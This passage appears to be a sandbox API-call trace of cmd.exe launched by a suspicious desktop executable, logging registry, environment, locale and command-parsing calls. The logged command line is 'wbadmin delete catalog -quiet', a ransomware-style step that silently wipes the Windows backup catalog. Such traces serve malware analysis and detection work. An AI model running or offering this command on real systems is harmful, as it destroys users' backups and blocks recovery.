lpBuffer=0x14fbc0*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.182] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14fbc0, dwLength=0x30 | out: lpBuffer=0x14fbc0*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.182] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fbc0, dwLength=0x30 | out: lpBuffer=0x14fbc0*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0099.182] GetConsoleOutputCP () returned 0x1b5 [0099.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.182] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.182] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.182] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.183] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.183] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.183] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.183] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.183] GetEnvironmentStringsW () returned 0x248a60* [0099.183] GetProcessHeap () returned 0x230000 [0099.183] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xa7c) returned 0x2494f0 [0099.183] FreeEnvironmentStringsW (penv=0x248a60) returned 1 [0099.183] GetProcessHeap () returned 0x230000 [0099.183] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x8) returned 0x2488e0 [0099.183] GetEnvironmentStringsW () returned 0x248a60* [0099.183] GetProcessHeap () returned 0x230000 [0099.183] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xa7c) returned 0x249f80 [0099.184] FreeEnvironmentStringsW (penv=0x248a60) returned 1 [0099.184] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eb18 | out: phkResult=0x14eb18*=0x44) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x18, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x1, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x1, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x0, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x40, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x40, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x40, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegCloseKey (hKey=0x44) returned 0x0 [0099.184] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eb18 | out: phkResult=0x14eb18*=0x44) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x40, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x1, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x1, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x0, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x9, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x4, lpData=0x14eb30*=0x9, lpcbData=0x14eb14*=0x4) returned 0x0 [0099.184] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eb10, lpData=0x14eb30, lpcbData=0x14eb14*=0x1000 | out: lpType=0x14eb10*=0x0, lpData=0x14eb30*=0x9, lpcbData=0x14eb14*=0x1000) returned 0x2 [0099.184] RegCloseKey (hKey=0x44) returned 0x0 [0099.184] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.185] srand (_Seed=0x5dc41ad7) [0099.185] GetCommandLineW () returned="/C wbadmin delete catalog -quiet" [0099.185] GetCommandLineW () returned="/C wbadmin delete catalog -quiet" [0099.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.185] GetProcessHeap () returned 0x230000 [0099.185] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x218) returned 0x24aa10 [0099.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.185] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.185] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.185] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.185] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.185] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.185] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.185] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.185] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.185] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.185] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.185] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.185] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.185] GetProcessHeap () returned 0x230000 [0099.185] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2494f0 | out: hHeap=0x230000) returned 1 [0099.185] GetEnvironmentStringsW () returned 0x248a60* [0099.185] GetProcessHeap () returned 0x230000 [0099.185] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xa94) returned 0x24ac30 [0099.186] FreeEnvironmentStringsW (penv=0x248a60) returned 1 [0099.186] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.186] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.186] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.186] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.186] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.186] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.186] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.186] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.186] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.186] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.186] GetProcessHeap () returned 0x230000 [0099.186] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x5c) returned 0x24b6d0 [0099.186] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f920 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x14f920, lpFilePart=0x14f900 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f900*="Desktop") returned 0x25 [0099.186] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.186] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f630 | out: lpFindFileData=0x14f630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x24b740 [0099.186] FindClose (in: hFindFile=0x24b740 | out: hFindFile=0x24b740) returned 1 [0099.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14f630 | out: lpFindFileData=0x14f630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x24b740 [0099.186] FindClose (in: hFindFile=0x24b740 | out: hFindFile=0x24b740) returned 1 [0099.187] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14f630 | out: lpFindFileData=0x14f630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x24b740 [0099.187] FindClose (in: hFindFile=0x24b740 | out: hFindFile=0x24b740) returned 1 [0099.187] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.187] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.187] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.187] GetProcessHeap () returned 0x230000 [0099.187] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac30 | out: hHeap=0x230000) returned 1 [0099.187] GetEnvironmentStringsW () returned 0x24b740* [0099.187] GetProcessHeap () returned 0x230000 [0099.187] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xae8) returned 0x24c230 [0099.187] FreeEnvironmentStringsW (penv=0x24b740) returned 1 [0099.187] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.187] GetProcessHeap () returned 0x230000 [0099.187] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b6d0 | out: hHeap=0x230000) returned 1 [0099.187] GetProcessHeap () returned 0x230000 [0099.187] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4016) returned 0x24cd20 [0099.187] GetProcessHeap () returned 0x230000 [0099.188] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x50) returned 0x249550 [0099.188] GetProcessHeap () returned 0x230000 [0099.188] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd20 | out: hHeap=0x230000) returned 1 [0099.188] GetConsoleOutputCP () returned 0x1b5 [0099.416] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.416] GetUserDefaultLCID () returned 0x409 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fa30, cchData=128 | out: lpLCData="0") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fa30, cchData=128 | out: lpLCData="0") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fa30, cchData=128 | out: lpLCData="1") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.417] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.417] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.418] GetProcessHeap () returned 0x230000 [0099.418] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x20c) returned 0x249620 [0099.418] GetConsoleTitleW (in: lpConsoleTitle=0x249620, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.418] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.418] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.418] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.418] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.419] GetProcessHeap () returned 0x230000 [0099.419] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4012) returned 0x24cd20 [0099.419] GetProcessHeap () returned 0x230000 [0099.419] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd20 | out: hHeap=0x230000) returned 1 [0099.419] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0099.419] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0099.419] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0099.419] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0099.419] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0099.419] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0099.419] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0099.419] GetProcessHeap () returned 0x230000 [0099.419] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0) returned 0x249840 [0099.419] GetProcessHeap () returned 0x230000 [0099.420] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x20) returned 0x2445e0 [0099.420] GetProcessHeap () returned 0x230000 [0099.420] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x249900 [0099.421] GetConsoleTitleW (in: lpConsoleTitle=0x14f940, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.421] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0099.421] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0099.421] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0099.421] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0099.421] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0099.421] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0099.421] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0099.421] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0099.421] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0099.421] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0099.421] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0099.421] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0099.421] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0099.421] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0099.421] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0099.421] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0099.421] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0099.421] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0099.421] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0099.421] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0099.421] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0099.421] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0099.421] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0099.421] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0099.422] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0099.422] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0099.422] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0099.422] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0099.422] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0099.422] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0099.422] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0099.422] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0099.422] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0099.422] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0099.422] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0099.422] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0099.422] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0099.422] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0099.422] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0099.422] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0099.422] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0099.422] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0099.422] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0099.422] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0099.422] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0099.422] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0099.422] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0099.422] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0099.422] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0099.422] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0099.422] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0099.422] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0099.422] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0099.422] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0099.422] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0099.422] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0099.422] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0099.422] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0099.422] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0099.422] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0099.422] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0099.422] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0099.422] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0099.422] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0099.423] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0099.423] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0099.423] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0099.423] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0099.423] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0099.423] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0099.423] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0099.423] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0099.423] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0099.423] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0099.423] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0099.423] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0099.423] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0099.423] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0099.423] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0099.423] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0099.423] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0099.423] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0099.423] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0099.423] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0099.423] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0099.423] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0099.423] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0099.423] GetProcessHeap () returned 0x230000 [0099.423] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x218) returned 0x249950 [0099.423] GetProcessHeap () returned 0x230000 [0099.423] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4e) returned 0x249b70 [0099.424] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0099.424] GetProcessHeap () returned 0x230000 [0099.424] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x420) returned 0x231320 [0099.424] SetErrorMode (uMode=0x0) returned 0x0 [0099.424] SetErrorMode (uMode=0x1) returned 0x0 [0099.424] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x231330, lpFilePart=0x14f1d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14f1d0*="Desktop") returned 0x25 [0099.424] SetErrorMode (uMode=0x0) returned 0x1 [0099.424] GetProcessHeap () returned 0x230000 [0099.424] RtlReAllocateHeap (Heap=0x230000, Flags=0x0, Ptr=0x231320, Size=0x6c) returned 0x231320 [0099.424] GetProcessHeap () returned 0x230000 [0099.424] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x231320) returned 0x6c [0099.424] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.424] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.425] GetProcessHeap () returned 0x230000 [0099.425] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x128) returned 0x249bd0 [0099.425] GetProcessHeap () returned 0x230000 [0099.425] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x240) returned 0x249d00 [0099.430] GetProcessHeap () returned 0x230000 [0099.430] RtlReAllocateHeap (Heap=0x230000, Flags=0x0, Ptr=0x249d00, Size=0x12a) returned 0x249d00 [0099.430] GetProcessHeap () returned 0x230000 [0099.430] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x249d00) returned 0x12a [0099.430] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 